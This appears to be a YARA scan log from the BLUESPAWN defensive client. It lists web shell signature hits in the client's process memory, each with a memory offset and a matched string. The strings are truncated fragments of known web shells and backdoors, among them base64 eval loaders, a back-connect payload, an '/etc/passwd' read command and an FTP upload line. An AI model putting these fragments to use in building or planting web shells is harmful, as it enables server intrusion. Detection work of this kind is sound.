- 0x3502c6:$s0: C:\tmp\dump_
- 0x2f4fa9:$s1: RST MySQL
- 0x2fbea4:$s1: RST MySQL
- 0x3502d5:$s1: RST MySQL
- 0x3556c0:$s1: RST MySQL
- 0x2f4fbf:$s2: http://rst.void.ru
- 0x2fbec4:$s2: http://rst.void.ru
- 0x2fbee8:$s2: http://rst.void.ru
- 0x3502e1:$s2: http://rst.void.ru
- 0x3556e0:$s2: http://rst.void.ru
- 0x3556fa:$s2: http://rst.void.ru
- 0x2f4fde:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
- 0x3502f6:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | wh_bindshell_py | Semi-Auto-generated - file wh_bindshell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f513b:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x3503ff:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x2f5176:$s2: python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
- 0x2f51c6:$s3: #bugz: ctrl+c etc =script stoped=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | lurm_safemod_on_cgi | Semi-Auto-generated - file lurm_safemod_on.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f52f1:$s0: Network security team :: CGI Shell
- 0x2f5320:$s1: #########################<<KONEC>>#####################################
- 0x2f5374:$s2: ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | c99madshell_v2_0_php_php | Semi-Auto-generated - file c99madshell_v2.0.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f54c3:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
- 0x3506b7:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backupsql_php_often_with_c99shell | Semi-Auto-generated - file backupsql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5629:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x3507c9:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x2f567f:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a5b4:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x350815:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x36005d:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | uploader_php_php | Semi-Auto-generated - file uploader.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f57d2:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x2f580d:$s3: Send this file: <INPUT NAME="userfile" TYPE="file">
- 0x2f584d:$s4: <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnet_pl | Semi-Auto-generated - file telnet.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f597c:$s0: W A R N I N G: Private Server
- 0x2fcc64:$s0: W A R N I N G: Private Server
- 0x350a56:$s0: W A R N I N G: Private Server
- 0x356136:$s0: W A R N I N G: Private Server
- 0x2f59a6:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
- 0x350a76:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | w3d_php_php | Semi-Auto-generated - file w3d.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5aee:$s0: W3D Shell
- 0x350b6a:$s0: W3D Shell
- 0x2f5b04:$s1: By: Warpboy
- 0x350b76:$s1: By: Warpboy
- 0x2f5b1c:$s2: No Query Executed
- 0x350b84:$s2: No Query Executed
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_cgi | Semi-Auto-generated - file WebShell.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5b87:$s0: WebShell.cgi
- 0x2f5c29:$s0: WebShell.cgi
- 0x350bc8:$s0: WebShell.cgi
- 0x350c3d:$s0: WebShell.cgi
- 0x2f5c42:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
- 0x350c4c:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WinX_Shell_html | Semi-Auto-generated - file WinX Shell.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e033a:$s0: WinX Shell
- 0x2f5cda:$s0: WinX Shell
- 0x2f5d7f:$s0: WinX Shell
- 0x30ca60:$s0: WinX Shell
- 0x30cbcf:$s0: WinX Shell
- 0x342183:$s0: WinX Shell
- 0x350cbd:$s0: WinX Shell
- 0x350d35:$s0: WinX Shell
- 0x361c7e:$s0: WinX Shell
- 0x361d92:$s0: WinX Shell
- 0x2f5d96:$s1: Created by greenwood from n57
- 0x30cbf8:$s1: Created by greenwood from n57
- 0x350d42:$s1: Created by greenwood from n57
- 0x361db2:$s1: Created by greenwood from n57
- 0x2f5dc0:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
- 0x350d62:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Dx_php_php | Semi-Auto-generated - file Dx.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2da53c:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x33e14f:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5f3f:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x350e83:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x2f5f9c:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
- 0x350ed6:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | csh_php_php | Semi-Auto-generated - file csh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f60e2:$s0: .::[c0derz]::. web-shell
- 0x350fc8:$s0: .::[c0derz]::. web-shell
- 0x2f6107:$s1: http://c0derz.org.ua
- 0x350fe3:$s1: http://c0derz.org.ua
- 0x2f6128:$s2: vint21h@c0derz.org.ua
- 0x350ffa:$s2: vint21h@c0derz.org.ua
- 0x2f614a:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
- 0x351012:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pHpINJ_php_php | Semi-Auto-generated - file pHpINJ.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6279:$s1: News Remote PHP Shell Injection
- 0x3510ed:$s1: News Remote PHP Shell Injection
- 0x2f62a5:$s3: Php Shell <br />
- 0x307331:$s3: Php Shell <br />
- 0x35daa6:$s3: Php Shell <br />
- 0x2f62c2:$s4: <input type = "text" name = "url" value = "
- 0x351122:$s4: <input type = "text" name = "url" value = "
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sig_2008_php_php | Semi-Auto-generated - file 2008.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f63ed:$s0: Codz by angel(4ngel)
- 0x3511f9:$s0: Codz by angel(4ngel)
- 0x2f640e:$s1: Web: http://www.4ngel.net
- 0x351210:$s1: Web: http://www.4ngel.net
- 0x2f6434:$s2: $admin['cookielife'] = 86400;
- 0x35122c:$s2: $admin['cookielife'] = 86400;
- 0x2f645e:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
- 0x35124c:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ak74shell_php_php | Semi-Auto-generated - file ak74shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f659f:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x351339:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x2f65f8:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x30a84c:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x351388:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x36026b:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x2f65c6:$s3: $xshell
- 0x2f6634:$s3: $xshell
- 0x351360:$s3: $xshell
- 0x3513ba:$s3: $xshell
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Rem_View_php_php | Semi-Auto-generated - file Rem View.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f673f:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x351471:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x2d5acc:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f678f:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33af2b:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x3514b7:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f67e8:$s4: Welcome to phpRemoteView (RemView)
- 0x351506:$s4: Welcome to phpRemoteView (RemView)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Java_Shell_js | Semi-Auto-generated - file Java Shell.js.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6908:$s2: PySystemState.initialize(System.getProperties(), null, argv);
- 0x2f6952:$s3: public class JythonShell extends JPanel implements Runnable {
- 0x2f699c:$s4: public static int DEFAULT_SCROLLBACK = 100
- 0x351652:$s4: public static int DEFAULT_SCROLLBACK = 100
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | STNC_php_php | Semi-Auto-generated - file STNC.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6ac2:$s0: drmist.ru
- 0x2f6ad8:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x351730:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x2f6b2e:$s2: STNC WebShell
- 0x30b096:$s2: STNC WebShell
- 0x35177c:$s2: STNC WebShell
- 0x3608ca:$s2: STNC WebShell
- 0x2f6b48:$s3: http://www.security-teams.net/index.php?showtopic=
- 0x35178c:$s3: http://www.security-teams.net/index.php?showtopic=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | aZRaiLPhp_v1_0_php | Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6c82:$s0: azrailphp
- 0x351872:$s0: azrailphp
- 0x2f6c98:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x35187e:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x2f6cee:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
- 0x3518ca:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Moroccan_Spamers_Ma_EditioN_By_GhOsT_php | Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6e62:$s0: ;$sd98="john.barker446@gmail.com"
- 0x3519ea:$s0: ;$sd98="john.barker446@gmail.com"
- 0x2f6e90:$s1: print "Sending mail to $to....... ";
- 0x309a72:$s1: print "Sending mail to $to....... ";
- 0x351a0e:$s1: print "Sending mail to $to....... ";
- 0x35f802:$s1: print "Sending mail to $to....... ";
- 0x2f6ec1:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
- 0x351a35:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | zacosmall_php | Semi-Auto-generated - file zacosmall.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5fa5:$s0: rand(1,99999);$sj98
- 0x2f7009:$s0: rand(1,99999);$sj98
- 0x2f9f8e:$s0: rand(1,99999);$sj98
- 0x2fb6bd:$s0: rand(1,99999);$sj98
- 0x30db34:$s0: rand(1,99999);$sj98
- 0x350edf:$s0: rand(1,99999);$sj98
- 0x351b29:$s0: rand(1,99999);$sj98
- 0x353f30:$s0: rand(1,99999);$sj98
- 0x3550b9:$s0: rand(1,99999);$sj98
- 0x36292b:$s0: rand(1,99999);$sj98
- 0x2f7029:$s1: $dump_file.='`'.$rows2[0].'`
- 0x351b3f:$s1: $dump_file.='`'.$rows2[0].'`
- 0x2f7052:$s3: filename=\"dump_{$db_dump}_${table_d
- 0x351b5e:$s3: filename=\"dump_{$db_dump}_${table_d
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CmdAsp_asp | Semi-Auto-generated - file CmdAsp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f70ce:$s0: CmdAsp.asp
- 0x2f716e:$s0: CmdAsp.asp
- 0x309d59:$s0: CmdAsp.asp
- 0x309f12:$s0: CmdAsp.asp
- 0x309f2d:$s0: CmdAsp.asp
- 0x314ddb:$s0: CmdAsp.asp
- 0x351bb3:$s0: CmdAsp.asp
- 0x351c26:$s0: CmdAsp.asp
- 0x35fa23:$s0: CmdAsp.asp
- 0x35fb6d:$s0: CmdAsp.asp
- 0x35fb7f:$s0: CmdAsp.asp
- 0x367aa3:$s0: CmdAsp.asp
- 0x2d6416:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f7185:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f71d2:$s2: -- Use a poor man's pipe ... a temp file --
- 0x309e96:$s2: -- Use a poor man's pipe ... a temp file --
- 0x351c76:$s2: -- Use a poor man's pipe ... a temp file --
- 0x35fb05:$s2: -- Use a poor man's pipe ... a temp file --
- 0x2f720a:$s3: maceo @ dogmile.com
- 0x309e73:$s3: maceo @ dogmile.com
- 0x351ca4:$s3: maceo @ dogmile.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | simple_backdoor_php | Semi-Auto-generated - file simple-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2dec4a:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f7327:$s0: $cmd = ($_REQUEST['cmd']);
- 0x308f7b:$s0: $cmd = ($_REQUEST['cmd']);
- 0x35eff2:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f734e:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x351d8a:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x35ef23:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x35f5f8:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_shell_php | Semi-Auto-generated - file mysql_shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f74d7:$s0: SooMin Kim
- 0x2fd96a:$s0: SooMin Kim
- 0x351eb5:$s0: SooMin Kim
- 0x356adb:$s0: SooMin Kim
- 0x2f74ee:$s1: smkim@popeye.snu.ac.kr
- 0x351ec2:$s1: smkim@popeye.snu.ac.kr
- 0x2f7511:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
- 0x351edb:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Dive_Shell_1_0___Emperor_Hacking_Team_php | Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7696:$s0: Emperor Hacking TEAM
- 0x35200c:$s0: Emperor Hacking TEAM
- 0x2f76b7:$s1: Simshell
- 0x2f8165:$s1: Simshell
- 0x2e953e:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f76cc:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f8188:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2fcb2d:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x348195:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x35202e:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x352866:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x356053:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f76f9:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
- 0x352051:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Asmodeus_v0_1_pl | Semi-Auto-generated - file Asmodeus v0.1.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7848:$s0: [url=http://www.governmentsecurity.org
- 0x35214c:$s0: [url=http://www.governmentsecurity.org
- 0x2f787b:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x352175:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x2f78ae:$s2: print "Asmodeus Perl Remote Shell
- 0x35219e:$s2: print "Asmodeus Perl Remote Shell
- 0x2f78dc:$s4: $internet_addr = inet_aton("$host") or die "ALOA:$!\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backup_php_often_with_c99shell | Semi-Auto-generated - file backup.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7a23:$s0: #phpMyAdmin MySQL-Dump
- 0x2f7a46:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x3522ce:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x2f7a8b:$s4: $data .= "#Database: $database
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reader_asp | Semi-Auto-generated - file Reader.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7ba1:$s1: Mehdi & HolyDemon
- 0x3523cb:$s1: Mehdi & HolyDemon
- 0x2f7bbf:$s2: www.infilak.
- 0x3523df:$s2: www.infilak.
- 0x2f7bd8:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
- 0x3523ee:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell17_php | Semi-Auto-generated - file phpshell17.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2d4f3d:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d26:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32031e:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d76:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x35252e:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x2f7dd3:$s2: href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | myshell_php_php | Semi-Auto-generated - file myshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7f1c:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x352676:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x2f7f6f:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x3526bf:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x2f7fc7:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
- 0x35270d:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SimShell_1_0___Simorgh_Security_MGZ_php | Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f813e:$s0: Simorgh Security Magazine
- 0x352830:$s0: Simorgh Security Magazine
- 0x2f8165:$s1: Simshell.css
- 0x35284d:$s1: Simshell.css
- 0x2f817e:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x35285c:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x2f81d7:$s3: www.simorgh-ev.com
- 0x305afc:$s3: www.simorgh-ev.com
- 0x3528ab:$s3: www.simorgh-ev.com
- 0x35c7ef:$s3: www.simorgh-ev.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | jspshall_jsp | Semi-Auto-generated - file jspshall.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f82e5:$s0: kj021320
- 0x352965:$s0: kj021320
- 0x2f82fa:$s1: case 'T':systemTools(out);break;
- 0x352970:$s1: case 'T':systemTools(out);break;
- 0x2f8327:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
- 0x352993:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rootshell_php | Semi-Auto-generated - file rootshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f85a4:$s0: shells.dl.am
- 0x352b5e:$s0: shells.dl.am
- 0x2f85bd:$s1: This server has been infected by $owner
- 0x352b6d:$s1: This server has been infected by $owner
- 0x2f85f1:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x352b97:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x2f8633:$s4: Could not write to file! (Maybe you didn't enter any text?)
- 0x352bcf:$s4: Could not write to file! (Maybe you didn't enter any text?)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | connectback2_pl | Semi-Auto-generated - file connectback2.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8770:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x352cb8:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x2f87cd:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x352d0b:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x2f882a:$s2: ConnectBack Backdoor
- 0x352d5e:$s2: ConnectBack Backdoor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DefaceKeeper_0_2_php | Semi-Auto-generated - file DefaceKeeper_0.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f894a:$s0: target fi1e:<br><input type="text" name="target" value="index.php"></br>
- 0x2f899f:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
- 0x352e75:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
- 0x2f89fb:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
- 0x352ec7:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shells_PHP_wso | Semi-Auto-generated - file wso.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8b3c:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x352fb4:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x2f8b98:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
- 0x353006:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backdoor1_php | Semi-Auto-generated - file backdoor1.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8ce2:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x3530fc:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x2f8d35:$s2: class backdoor {
- 0x353145:$s2: class backdoor {
- 0x2f8d52:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
- 0x353158:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | elmaliseker_asp | Semi-Auto-generated - file elmaliseker.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8e9d:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x35324f:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x2f8ef6:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x35329e:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x2f8f34:$s2: dim zombie_array,special_array
- 0x3532d2:$s2: dim zombie_array,special_array
- 0x2f8f5f:$s3: http://vnhacker.org
- 0x3532f3:$s3: http://vnhacker.org
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | indexer_asp | Semi-Auto-generated - file indexer.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e2291:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f906c:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3174d4:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x34368c:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3533ac:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x369616:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f90c5:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
- 0x3533fb:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DxShell_php_php | Semi-Auto-generated - file DxShell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2da53c:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
